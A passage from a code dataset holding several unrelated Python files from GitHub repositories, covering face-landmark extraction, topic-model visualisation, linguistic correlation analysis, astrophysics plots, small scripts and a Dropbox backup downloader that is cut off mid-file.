\t\t# specific face part\n \t\t#for (x, y) in shape[i:j]:\n \t\t#\tcv2.circle(clone, (x, y), 1, (0, 0, 255), -1)\n\n\n # extract the ROI of the face region as a separate image\n '''\n \t\t(x, y, w, h) = cv2.boundingRect(np.array([shape[i:j]]))\n \t\troi = image[y:y + h, x:x + w]\n \t\troi = imutils.resize(roi, width=250, inter=cv2.INTER_CUBIC)\n \t\t# show the particular face part\n \t\tcv2.imshow(\"ROI\", roi)\n \t\tcv2.imshow(\"Image\", clone)\n \t\tcv2.waitKey(0)\n '''\n\n \t# visualize all facial landmarks with a transparent overlay\n\n \t#output = face_utils.visualize_facial_landmarks(image, shape)\n \t#cv2.imshow(\"Image\", output)\n \t#cv2.waitKey(0)\n\n return parts\n\ndef convert_parts_to_slices(parts, w):\n slices = {}\n try:\n if parts['left_eye'][1] < parts['right_eye'][1]:\n y1a = parts['left_eye'][1]\n else:\n y1a = parts['right_eye'][1]\n if parts['left_eye'][3] > parts['right_eye'][3]:\n y2a = parts['left_eye'][3]\n else:\n y2a = parts['right_eye'][3]\n except:\n y1a = w * 2\n y2a = 0\n\n try:\n if parts['left_eyebrow'][1] < parts['right_eyebrow'][1]:\n y1b = parts['left_eyebrow'][1]\n else:\n y1b = parts['right_eyebrow'][1]\n if parts['left_eyebrow'][3] > parts['right_eyebrow'][3]:\n y2b = parts['left_eyebrow'][3]\n else:\n y2b = parts['right_eyebrow'][3]\n #slices['eye_brow'] = (0, y1, w, y2)\n except:\n y1b = w * 2\n y2b = 0\n\n if not(y2a == 0 and y2b == 0):\n if y1a > y1b:\n y1a = y1b\n if y2b > y2a:\n y2a = y2b\n slices['eye'] = (0, y1a, w, y2a)\n\n try:\n slices['mouth'] = (0, parts['mouth'][1], w, parts['mouth'][3])\n except:\n pass\n #slices['nose'] = (0, parts['nose'][1], w, parts['nose'][3])\n try:\n slices['nose'] = parts['nose']\n except:\n pass\n\n return slices\n\ndef load_image(img_file):\n print (\"Loading: \", os.path.basename(img_file))\n img = Image.open(img_file)\n \"\"\"\n w = int(IMG_HEIGHT / img.size[1] * img.size[0])\n img = img.resize((w, IMG_HEIGHT), Image.ANTIALIAS)\n #img.thumbnail((w, IMG_HEIGHT), Image.ANTIALIAS)\n if w > IMG_WIDTH:\n # neeed to crop the sides of the image, centering it (height is alread correct)\n border = (w - IMG_WIDTH) / 2\n area = (border, 0, w - border, IMG_HEIGHT)\n img = img.crop(area)\n \"\"\"\n img = img.convert('RGB')\n img = np.array(img)\n img = img[:, :, ::-1].copy()\n\n parts = detect_face_parts(img)\n #slices = convert_parts_to_slices(parts, img.size[1])\n\n result = {\n #'name': os.path.basename(img_file),\n #'img': img,\n 'parts': parts\n #'slices':slices\n }\n\n return result\n\n#b = load_image(r\"D:\\git_hub\\aporto\\python.git\\face_mixer_photos_pcg\\pics\\mediciner.png\")\n#d = load_image(r\"D:\\git_hub\\aporto\\python.git\\face_mixer_photos_pcg\\pics\\daniel.png\")\n\ndef main():\n path = os.path.dirname(__file__)\n pics_path = os.path.join(path, \"pics\")\n files = [os.path.join(pics_path, f) for f in os.listdir(pics_path)]\n files = [f for f in files if os.path.splitext(f)[1].upper() != \".DB\"]\n\n imgs = {}\n for f in files:\n img = load_image(f)\n if len(img['parts']) > 0:\n imgs[os.path.basename(f)] = img\n\n with open (\"image_data.json\", \"w\") as f:\n s = json.dumps(imgs, indent=4, sort_keys=True)\n f.write(s)\n\nmain()","repo_name":"aporto/python","sub_path":"face_mixer_photos_pcg_v2/extract_image_data.py","file_name":"extract_image_data.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17609538107","text":"from random import *\nimport time\n\nnumeros = []\n\nfor v in range(1, 10000000):\n 
numeros.append(randint(1, 10000000))\n\nnumeros.sort()\nprint(numeros[950000])\n\n\nnum = int(input(\"Digite o número:\"))\ntempo_inicial = int(round(time.time() * 1000))\n\nfor v in numeros:\n if v == num:\n print(\"Existe:\", num)\n break\n\ntempo = (int(round(time.time() * 1000)) - tempo_inicial)\nprint(\"Tempo\", tempo)\n\n\n\n\n\n\n\n","repo_name":"mickaelsouzadev/TAP","sub_path":"Aula_8_Exception_Recursion/2_Recursividade/4_Busca.py","file_name":"4_Busca.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"42335447905","text":"__author__ = 'GCassani'\n\nimport helpers as help\nfrom collections import defaultdict\n\n\ndef map_affix_to_idx(affix_file):\n\n \"\"\"\n :param affix_file: the path to the file containing the ordered list of affixes\n :return ids2affixes: a dictionary mapping numerical indices to affixes\n \"\"\"\n\n ids2affixes = {}\n with open(affix_file, \"r\") as f:\n for idx, line in enumerate(f):\n if line.strip().isupper():\n ids2affixes[idx] = line.strip()\n\n return ids2affixes\n\n\n########################################################################################################################\n\n\ndef map_nonwords_to_affix(correlation_file, ids2affixes):\n\n \"\"\"\n :param correlation_file: the path to the file storing correlations for each nonword\n :param ids2affixes: a dictionary mapping row indices to affixes\n :return nonwords2affixes: a dictionary mapping each nonword to all anchors and the corresponding pairwise\n correlation between the nonword and anchor semantic vector\n \"\"\"\n\n ids2nonwords = help.map_indices_to_test_words(correlation_file)\n\n nonwords2affixes = defaultdict(dict)\n with open(correlation_file, \"r\") as f:\n for row_id, line in enumerate(f):\n words = line.strip().split('\\t')\n for col_id, corr in enumerate(words):\n if not corr in ids2nonwords.values():\n nonwords2affixes[ids2nonwords[col_id]][ids2affixes[row_id]] = float(corr)\n\n return nonwords2affixes\n\n\n########################################################################################################################\n\n\ndef write_correlations(nonwords2affixes, ids2affixes, output_file, table_format=\"long\", cond=\"minimalist\"):\n\n \"\"\"\n :param nonwords2affixes: a dictionary mapping each nonword to all anchors and the corresponding pairwise\n correlation between the nonword and anchor semantic vector\n :param ids2affixes: a dictionary mapping numerical indices to affixes\n :param output_file: the path to the file where the output is going to be written to\n :param cond: a string indicating the input used for the experiment\n :param table_format: a string indicating how to print data to table, either 'long' or 'wide'. In the long\n format, five columns are created, first the nonword, then the condition, then the\n affix, then the correlation. In the wide format, each affix is a different column,\n with each nonword-affix cell indicates the correlation between the semantic vector for\n the nonword and the semantic vector for the affix. 
An extra column indicates the\n                                condition.\n    \"\"\"\n\n    inflections = sorted(set(ids2affixes.values()))\n\n    with open(output_file, \"w\") as f:\n\n        if table_format == 'long':\n            f.write('\\t'.join([\"Nonword\", \"Target\", \"Condition\", \"Affix\", \"Correlation\"]))\n            f.write('\\n')\n            for nonword in nonwords2affixes:\n                baseform, tag = nonword.split(\"|\")\n                for affix in inflections:\n                    corr = str(nonwords2affixes[nonword][affix])\n                    f.write('\\t'.join([baseform, tag, cond, affix, corr]))\n                    f.write('\\n')\n\n        elif table_format == 'wide':\n            f.write('\\t'.join([\"Nonword\", \"Target\", \"Condition\", \"\\t\".join(inflections)]))\n            f.write('\\n')\n            for nonword in nonwords2affixes:\n                baseform, tag = nonword.split(\"|\")\n                correlations = []\n                for affix in inflections:\n                    correlations.append(str(nonwords2affixes[nonword][affix]))\n                f.write('\\t'.join([baseform, tag, cond, '\\t'.join(correlations)]))\n                f.write('\\n')\n\n        else:\n            raise ValueError(\"unrecognized format %s!\" % table_format)\n\n\n########################################################################################################################\n\n\ndef affix_analysis(affix_file, correlations_file, output_file, table_format=\"long\", cond=\"minimalist\"):\n\n    \"\"\"\n    :param affix_file:          the path to the file containing the ordered list of affixes\n    :param correlations_file:   the path containing the correlations between each nonword and all affixes\n    :param output_file:         the path to the file where the output is going to be written to\n    :param cond:                a string indicating the input used for the experiment\n    :param table_format:        a string indicating how to print data to table, either 'long' or 'wide'. In the long\n                                format, five columns are created: first the nonword, then the target, then the\n                                condition, then the affix, then the correlation. In the wide format, each affix is a different column,\n                                with each nonword-affix cell indicating the correlation between the semantic vector\n                                for the nonword and the semantic vector for the affix. 
An extra column indicates the\n condition.\n \"\"\"\n\n ids2affixes = map_affix_to_idx(affix_file)\n nonwords2affixes = map_nonwords_to_affix(correlations_file, ids2affixes)\n write_correlations(nonwords2affixes, ids2affixes, output_file, table_format=table_format, cond=cond)\n","repo_name":"GiovanniCassani/discriminative_learning","sub_path":"nonwords/affixes.py","file_name":"affixes.py","file_ext":"py","file_size_in_byte":5529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16694755194","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom dotenv import find_dotenv, load_dotenv\nfrom pathlib import Path\nimport pandas as pd\nimport pickle\nfrom bertopic import BERTopic\nimport numpy as np\n\n\ndef generate_visualisations(name, docs, titles, classes, in_path, out_path, embeddings):\n '''\n Visualise the given fitted BERTopic model\n Uses Uniform Manifold Approximation Projection (UMAP) to represent the embedding-space\n All visualisations are saved to file\n '''\n # load BERTopic model\n model_path = project_dir.joinpath(in_path)\n model = BERTopic.load(model_path)\n\n # transform training data by fitted BERTopic model\n topics, probs = model.transform(docs, embeddings)\n\n # get hierachical representation of topics (for hierarchical visualisation)\n hierarchical_topics = model.hierarchical_topics(docs)\n\n # get topics per SchoolCode (for stratified visualisation)\n topics_per_class = model.topics_per_class(docs, classes = classes)\n\n # set output directory for visualisations\n output = project_dir.joinpath(out_path)\n\n # get number of generated topics (excluding the outlier topic)\n num_topics = len(np.unique(topics)) - 1\n \n\n # VISUALISATION: 2D representation of topics\n output_topics = output.joinpath(f'visualise_topics_{name}.html')\n model.visualize_topics(title = f'Intertopic Distance Map {name}').write_html(output_topics)\n\n # VISUALISATION: 2D representation of documents\n output_documents = output.joinpath(f'visualise_documents_{name}.html')\n model.visualize_documents(titles.to_numpy(),\n embeddings = embeddings,\n title = f'Documents and Topics {name}').write_html(output_documents)\n\n # VISUALISATION: 2D representation of documents (NO LABELS)\n output_documents = output.joinpath(f'visualise_documents_{name}_NOLABEL.html')\n model.visualize_documents(titles.to_numpy(),\n embeddings = embeddings,\n title = f'Documents and Topics {name} NOLABEL',\n hide_annotations = True).write_html(output_documents)\n\n # VISUALISATION: hierarchical structure of topics\n output_hierarchy = output.joinpath(f'visualise_hierarchical_topics_{name}.html')\n model.visualize_hierarchy(hierarchical_topics = hierarchical_topics,\n title = f'Hierarchical Clustering {name}').write_html(output_hierarchy)\n\n # VISUALISATION: hierarchical structure of documents\n # skip this visualisation for Longformer-BERTopic (broken)\n # possibly broken for Longformer-BERTopic due to the low number of topics found\n if not name == 'longformer_bertopic':\n output_hierarchy_documents = output.joinpath(f'visualise_hierarchical_documents_{name}.html')\n model.visualize_hierarchical_documents(titles.to_numpy(), \n hierarchical_topics, \n embeddings = embeddings,\n hide_document_hover = False,\n title = f'Hierarchical Documents and Topics {name}').write_html(output_hierarchy_documents)\n\n # VISUALISATION: terms representative of topics, per topic\n output_representative_terms = output.joinpath(f'visualise_representative_terms_{name}.html')\n 
model.visualize_barchart(top_n_topics = num_topics,\n                            title = f'Topic Word Scores {name}').write_html(output_representative_terms)\n\n    # VISUALISATION: topic similarity matrix\n    # generate multiple matrices, each with i = 1, 2, ..., 10 similarity clusters\n    for i in range(1, min(num_topics, 11)):\n        output_similarity_matrix = output.joinpath(f'visualise_similarity_matrix_{i}_clusters_{name}.html')\n        model.visualize_heatmap(top_n_topics = num_topics,\n                                n_clusters = i,\n                                title = f'Similarity Matrix {i} clusters {name}').write_html(output_similarity_matrix)\n\n    # VISUALISATION: term score decline; the importance of terms, per topic\n    output_term_score = output.joinpath(f'visualise_term_score_{name}.html')\n    model.visualize_term_rank(title = f'Term score decline per Topic {name}').write_html(output_term_score)\n\n    # VISUALISATION: topics per university school (SchoolCode)\n    output_topics_per_school = output.joinpath(f'visualise_topics_per_school_{name}.html')\n    model.visualize_topics_per_class(topics_per_class, \n                                    top_n_topics = num_topics,\n                                    title = f'Topics per Class {name}').write_html(output_topics_per_school)\n\n\ndef main():\n    '''\n    Graphical visualisation of the FULLDATA_BigBird-CT-BERTopic topic model\n    visualisations saved to ../reports/figures/\n    '''\n    logger = logging.getLogger(__name__)\n    logger.info('visualising FULLDATA_BigBird-CT_BERTopic topic model output')\n\n    # load train.pkl\n    train_path = project_dir.joinpath('data/processed/train.pkl')\n    train = pd.read_pickle(train_path)\n    \n    # load test_unlabelled.pkl\n    test_path = project_dir.joinpath('data/interim/test_unlabelled.pkl')\n    test = pd.read_pickle(test_path)\n\n    # concatenate train and test data\n    fulldata = pd.concat([train, test])\n    fulldata_list = fulldata['Concatenated'].tolist()\n\n    # get documents, ModuleCodes and SchoolCodes\n    docs = fulldata['Concatenated']\n    titles = fulldata['ModuleCode'].apply(str) # modulecodes now strings instead of lists\n    classes = fulldata['SchoolCode']\n\n    # load full dataset BigBird-CT document embeddings\n    fulldata_bigbird_ct_embeddings_output = project_dir.joinpath('data/processed/fulldata_bigbird_ct_document_embeddings.pkl')\n    with open(fulldata_bigbird_ct_embeddings_output, \"rb\") as embeddings_input:\n        saved_embeddings = pickle.load(embeddings_input)\n    fulldata_bigbird_ct_embeddings = saved_embeddings['fulldata_bigbird_ct_embeddings']\n\n    # generate visualisations\n    # BigBird-CT-BERTopic\n    generate_visualisations('FULLDATA_bigbird_ct_bertopic',\n                            docs,\n                            titles,\n                            classes,\n                            'models/FULLDATA_bigbird-ct-bertopic',\n                            'reports/figures/fulldata_bigbird_ct_bertopic',\n                            fulldata_bigbird_ct_embeddings)\n    \n    logger.info('finished visualising topic modelling output, '\n                'output saved to ../reports/figures/fulldata_bigbird_ct_bertopic')\n\n\nif __name__ == '__main__':\n    log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n    logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n    # resolve project directory\n    project_dir = Path(__file__).resolve().parents[2]\n\n    # find .env by walking up directories until it's found, then load up the .env entries as environment variables\n    load_dotenv(find_dotenv())\n\n    main()","repo_name":"lukekaye/sts-university-modules","sub_path":"src/visualization/visualise_fulldata_bigbird_ct_bertopic.py","file_name":"visualise_fulldata_bigbird_ct_bertopic.py","file_ext":"py","file_size_in_byte":7079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3927324013","text":"## sys01_crawler.py\n##\n## 
python sys01_crawler.py -u http://www.naver.com\nimport sys\nimport requests\n\nargs = sys.argv[1:]\nprint(args)\n\nif (args[0]=='-u'):\n\tr = requests.get(args[1])\n\tprint(r.status_code)\n## Once the exercise is done, we will take a break until 5:15. \n## Rest while practicing, then change this into a class structure \n\n## \n\n\n\n\t###print(\"No internet connection!!!\")\n","repo_name":"kang9693/pybasic5","sub_path":"sys01_crawler.py","file_name":"sys01_crawler.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38084736804","text":"import os\nimport sys\nimport numpy as np\n\nimport h5py\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))\n\nimport flares_1.analysis.plt as fplt\n\n\n\nDataFolder = f'/Users/stephenwilkins/research/simulations/FLARES/data/'\n\ndata = h5py.File(f'{DataFolder}/flares_noparticles.hdf5', 'r')\n\n\nsnaps = {'010_z005p000': 5.0, '009_z006p000': 6.0, '008_z007p000': 7.0, '007_z008p000': 8.0, '006_z009p000': 9.0, '005_z010p000': 10.0}\n\nsnap = '010_z005p000'\n\nxlims = [8, 11.5]\nylims = [-1.5, 2.]\n\n\n# --- coloured by simulation\n\nby_sim = False\nif by_sim:\n    fig, ax = fplt.single()\n    for sim in data.keys():\n\n        sfr = data[f'{sim}/{snap}/Galaxy']['SFR']['SFR_10']\n        mstar = data[f'{sim}/{snap}/Galaxy']['Mstar_30']\n\n        ax.scatter(np.log10(mstar), np.log10(sfr)-np.log10(mstar), label = sim, s=5, alpha = 0.25)\n\n    # ax.set_ylim([27, 32])\n    # ax.set_xlim([7, 12])\n\n    ax.set_ylabel(r'$\\log_{10}({\\rm SFR}/{\\rm yr^{-1})}$')\n    ax.set_xlabel(r'$\\log_{10}(M_{\\star}/{\\rm M_{\\odot}})$')\n    ax.grid(True)\n    ax.legend(fontsize=6)\n    fig.savefig('figs/mass_sfr-sims.pdf')\n\n\n\n# --- all simulations (un-weighted)\n\nall = True\nif all:\n    fig, ax = fplt.single()\n\n    sfr = np.array([])\n    mstar = np.array([])\n\n    for sim in data.keys():\n        sfr = np.hstack((sfr, data[f'{sim}/{snap}/Galaxy']['SFR']['SFR_10']))\n        mstar = np.hstack((mstar, data[f'{sim}/{snap}/Galaxy']['Mstar_30']))\n\n\n    sfr[sfr<=0] = 1E-10\n    sfr = np.log10(sfr)\n    mstar = np.log10(mstar)\n\n    ssfr = sfr-mstar-1+9\n\n    # ax.scatter(np.log10(mstar), np.log10(sfr), s=1, alpha = 0.25, c='k', zorder = 1)\n    ax.hexbin(mstar, ssfr, gridsize = (25,25), bins = 'log', cmap='Greys', linewidths=0., mincnt = 1, extent = [*xlims, *ylims], alpha = 0.5, zorder = 2)\n\n    bins = np.arange(*xlims, 0.2)\n    P16, P50, P84 = fplt.average_line(mstar, ssfr,bins)\n\n    ax.fill_between(bins,P84,P16,color='k', alpha=0.15)\n    ax.plot(bins,P50,ls='-',c='k', alpha=1.0, lw=1)\n\n    ax.text(0.8, 0.9, f'$z={snaps[snap]}$', transform=ax.transAxes)\n\n    ax.set_ylim(ylims)\n    ax.set_xlim(xlims)\n    ax.set_ylabel(r'$\\log_{10}({\\rm sSFR}/{\\rm Gyr^{-1})}$')\n    ax.set_xlabel(r'$\\log_{10}(M_{\\star}/{\\rm M_{\\odot}})$')\n    ax.grid(True)\n    fig.savefig('figs/mass_sfr-all.pdf')\n\n\n\n# --- all simulations (un-weighted)\n\nredshift_evolution = True\nif redshift_evolution:\n\n    fig, ax = fplt.single()\n\n    for snap, z in snaps.items():\n\n        print('-'*5, snap)\n\n        sfr = np.array([])\n        mstar = np.array([])\n\n        for sim in data.keys():\n            sfr = np.hstack((sfr, data[f'{sim}/{snap}/Galaxy']['SFR']['SFR_10']))\n            mstar = np.hstack((mstar, data[f'{sim}/{snap}/Galaxy']['Mstar_30']))\n\n        sfr[sfr<=0] = 1E-10\n        sfr = np.log10(sfr)\n        mstar = np.log10(mstar)\n        ssfr = sfr-mstar-1+9\n\n        print(f'N: {sfr.shape[0]}')\n        print(f'max SFR: {np.max(sfr):.2f}')\n        print(f'max M*: {np.max(mstar):.2f}')\n\n        bins = np.arange(*xlims, 0.2)\n        P16, P50, P84 = fplt.average_line(mstar, ssfr,bins)\n\n        ax.fill_between(bins,P84,P16, 
color=fplt.c_z(z), alpha=0.1)\n        ax.plot(bins,P50,ls='-', color=fplt.c_z(z), alpha=1.0, lw=1, label = f'$z={z}$')\n\n\n\n    ax.set_ylim(ylims)\n    ax.set_xlim(xlims)\n    ax.set_ylabel(r'$\\log_{10}({\\rm sSFR}/{\\rm Gyr^{-1})}$')\n    ax.set_xlabel(r'$\\log_{10}(M_{\\star}/{\\rm M_{\\odot}})$')\n    ax.legend()\n    ax.grid(True)\n    fig.savefig('figs/mass_sfr-z.pdf')\n","repo_name":"stephenmwilkins/flares_1","sub_path":"examples/mass_sfr.py","file_name":"mass_sfr.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27217026439","text":"from django.conf.urls import patterns, url\n\nfrom Tasker import views\n\nurlpatterns = patterns('',\n    url(r'^$', views.index, name='index'),\n    url(r'^add$', views.add, name='add'),\n    url(r'^complete/(?P\\w+)$', views.complete, name='complete'),\n    url(r'^edit/(?P\\w+)$', views.edit, name='edit'),\n)\n","repo_name":"EricCline/Tasker","sub_path":"Tasker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70700563441","text":"class Person:\n    def __init__(self, name, age,address):\n        self.nama = name\n        self.umur = age\n        self.alamat = address\n\n    def myfunc(self):\n        print(\"Hello, my name is \" + self.nama)\n    # create an object from the Person class\n    \np1 = Person(\"jhon\", 39,\"Jakarta\")\np1.myfunc()\n\nprint(\"Name \",p1.nama)\nprint(\"Age \",p1.umur)\nprint(\"Address \",p1.alamat)","repo_name":"pang53rut/ptyhon","sub_path":"Latihan python/OOP.py","file_name":"OOP.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42275388355","text":"import json\n\npath = 'data/daily_train.json'\nkey_path = 'keywords/keys.json'\n\nkeys = []\n\ndata = {}\nwith open(path) as fp :\n    data =json.load(fp)\n\n#### get keywords \ntmp = {}\nwith open(key_path) as fp :\n    tmp = json.load(fp)\n\nfor k in tmp['gender']['men'] :\n    keys.append(k)\n\nfor k in tmp['gender']['women'] :\n    keys.append(k)\n\ncount = 0\ndata_keys = {'dialog' : []}\n\nfor sens in data['dialog'] :\n    # print(sens[0])\n    \n    for s in sens:\n        tmp_list = s.lower()\n        for k in keys :\n            if k in tmp_list.split() :\n                if [\" \".join([i for i in tmp_list.split()])] not in data_keys['dialog'] :\n                    data_keys['dialog'].append([\" \".join([i for i in tmp_list.split()])])\n\nprint(len(data_keys['dialog']))\n\nwith open('data/daily_train_key.json', 'w') as fp :\n    json.dump(data_keys, fp)\n    \n\n\n\n\n","repo_name":"ChengChengChu/nlp_project2","sub_path":"preprocess_get_keys.py","file_name":"preprocess_get_keys.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8505703934","text":"import common\nimport unittest\n\nclass TestHandlerCase(unittest.TestCase):\n\n    def test_email_required(self):\n        print(\"testing returns server error message\")\n        message = \"bad day\"\n        result = common.return_server_error(message)\n        print(result)\n        self.assertEqual(result['statusCode'], 500)\n        self.assertEqual(result['headers']['Content-Type'], 'application/json')\n        self.assertIn(message, result['body'])\n\nif __name__ == '__main__':\n    
unittest.main()\n","repo_name":"bolson9/funnyFuncs","sub_path":"tests/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40888744460","text":"__author__ = 'Gabor Szabo'\n\n\nimport sys, imp\n\n\ndef load_source(module_name, file_name, module_paths):\n    \"\"\"Loads the given module from a Python source file.\n\n    This function is called by PythonFunctionWrapper.prepare(...) after it\n    started the Python interpreter to request the given source file to be\n    loaded. The function is to be found in this source file.\n\n    module_paths is an array of path names where the sources or other\n    supporting files are found. In particular, module_paths[0] is the location\n    of the PyCascading Python sources, and module_paths[1] is the location of\n    the source file defining the function.\n\n    In Hadoop mode (with remote_deploy.sh), the first two -a options must\n    specify the archives of the PyCascading sources and the job sources,\n    respectively.\n\n    Arguments:\n    module_name -- the name of the variable to read the module into\n    file_name -- the file that contains the source for the module\n    module_paths -- the locations of the Python sources \n    \"\"\"\n    # This one should be on the classpath from the job jar or the extracted jar\n    from com.twitter.pycascading import Util\n\n    cascading_jar = Util.getCascadingJar()\n    jython_dir = module_paths[0]\n\n    sys.path.extend((cascading_jar, jython_dir + '/python',\n                     jython_dir + '/python/Lib'))\n    sys.path.extend(module_paths[1 : ])\n\n    # Allow importing of user-installed Jython packages\n    import site\n    site.addsitedir(jython_dir + 'python/Lib/site-packages')\n\n    # Haha... it's necessary to put this here, otherwise simplejson won't work.\n    # Maybe it's automatically imported in the beginning of a Jython program,\n    # but since at that point the sys.path is not set yet to Lib, it will fail?\n    #import encodings\n\n    return imp.load_source(module_name, file_name)\n","repo_name":"ProximaMonkey/pycascading","sub_path":"python/pycascading/init_module.py","file_name":"init_module.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"18084594804","text":"#!/usr/bin/python3\nimport fileinput\nimport json\nimport time\nimport calendar\nimport re\nimport shutil\nimport argparse\nimport logging, sys\nimport math\nimport os\n\nlogging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n\nparser = argparse.ArgumentParser(\n    description=\"Generate word list data based off of aggregate irc chat logs\"\n)\n\nparser.add_argument(\n    \"-outfile\",\n    help=\"output file to write to\",\n    default=\"/home/krowbar/logs/chatcloud_aggregate.json\"\n)\n\nparser.add_argument(\n    \"-logpath\",\n    type=str,\n    help=\"where the log files are kept\",\n    default=\"/home/krowbar/logs\",\n)\nargs = parser.parse_args()\n\nchatData = {\n    \"columns\": [ \"__TIMESTAMP__\" ],\n    \"data\": []\n}\n\nlogging.info(\n    \"Generating word graph based off words from \" + args.logpath\n)\n\nlogs = sorted([f for f in os.listdir(args.logpath) if re.match(r'chatcloud_[0-9]{4}_[0-9]{2}.json', f)])\nfor log in logs:\n    date = re.findall(\"[0-9]{4}_[0-9]{2}\", log)[0]\n    year = re.findall(\"[0-9]{4}\", date)[0]\n    if year < '2019':\n        continue\n    print(\"Processing: {}...\".format(log), end='')\n\n    logData = [ date ]\n    with open(os.path.join(args.logpath, log), \"r\") as logfile:\n        j = 
json.load(logfile)\n        for col in chatData['columns']:\n            if col in j.keys():\n                logData.append(j[col])\n            elif col != \"__TIMESTAMP__\":\n                logData.append(0)\n\n        for key in j.keys():\n            if key in chatData['columns']:\n                continue\n            else:\n                chatData['columns'].append(key)\n                for d in chatData['data']:\n                    d.append(0)\n                # append a 0 in each other chatData.data rows\n                logData.append(j[key])\n\n    chatData['data'].append(logData)\n    print(\" Columns: {}, Records: {}\".format(len(chatData['columns']), len(logData)))\n\nwith open(args.outfile + \".tmp\", \"w\") as tmpFile:\n    tmpFile.write(json.dumps(chatData))\n    # shutil.move(args.outfile + \".tmp\", args.outfile)\n    print(\"Dumped {} records to {}\".format(len(chatData['columns']), args.outfile))\n","repo_name":"RussellChamp/tilde-projects","sub_path":"Code/python/chatgraph.py","file_name":"chatgraph.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"21678956812","text":"import pysam\nimport gffutils\ndb = gffutils.FeatureDB(\"yeast.db\")\ninfile = pysam.AlignmentFile(\"output.sorted.bam\", \"rb\")\noutfile = open(\"gene_FPKM.txt\", \"w\")\n\nmydict = {}\ntotal = 0\n\nfor mRNA in db.features_of_type('mRNA'):\n\tfor CDS in db.children(mRNA, featuretype = 'CDS'):\n\t\tif CDS.chrom != 'chrmt':\n\t\t\tname = CDS[\"Name\"][0]\n\t\t\tcount = infile.count(reference = CDS.chrom, start=CDS.start,end=CDS.stop)\n\t\t\tif CDS.stop-CDS.start != 0:\n\t\t\t\tcount = float(count)/(CDS.stop-CDS.start)*1000000000\n\t\t\t\tmydict[name] = count\n\t\t\t\ttotal += count\n\nfor key, value in sorted(mydict.items()):\n\tFPKM = str(value/total)\n\toutfile.write(key)\n\toutfile.write(\"\\t\")\n\toutfile.write(FPKM)\n\toutfile.write(\"\\n\")\n\t\n\n\n\n","repo_name":"patrickbell12/School_Repository","sub_path":"Homework_6/Problem_3/gff_pys.py","file_name":"gff_pys.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70471963442","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\nimport os\nimport sys\n\nimport requests\nimport tqdm\n\n\ndef list_files(token, backup_dir):\n    headers = {\n        \"Authorization\": \"Bearer {}\".format(token),\n        \"Content-Type\": \"application/json\"\n    }\n    payload = {'path': backup_dir}\n    res = requests.post('https://api.dropboxapi.com/2/files/list_folder',\n                        headers=headers, data=json.dumps(payload))\n    if res.status_code != 200:\n        sys.stderr.write(\"Error\\n\")\n        sys.stderr.write(\"{}\\n\".format(res.text))\n        exit(-1)\n\n    return json.loads(res.text)\n\n\ndef download(token, path, chunk_size=(1024 ** 2)):\n    headers = {\n        \"Authorization\": \"Bearer {}\".format(token),\n        \"Dropbox-API-Arg\": json.dumps({\"path\": path})\n    }\n    res = requests.post('https://content.dropboxapi.com/2/files/download',\n                        headers=headers, stream=True)\n    if res.status_code != 200:\n        sys.stderr.write(\"Download error\\n\")\n        sys.stderr.write(\"{}\\n\".format(res.text))\n        exit(-1)\n\n    pbar = None\n    content_len = int(res.headers.get('Content-Length', 0))\n    if content_len:\n        pbar = tqdm.tqdm(total=content_len, ncols=100)\n\n    for chunk in res.iter_content(chunk_size=chunk_size):\n        sys.stdout.buffer.write(chunk)\n        if pbar:\n            pbar.update(chunk_size)\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('backup_dir')\n    args = parser.parse_args()\n\n    res = list_files(os.environ['DROPBOX_TOKEN'], args.backup_dir)\n    paths = 
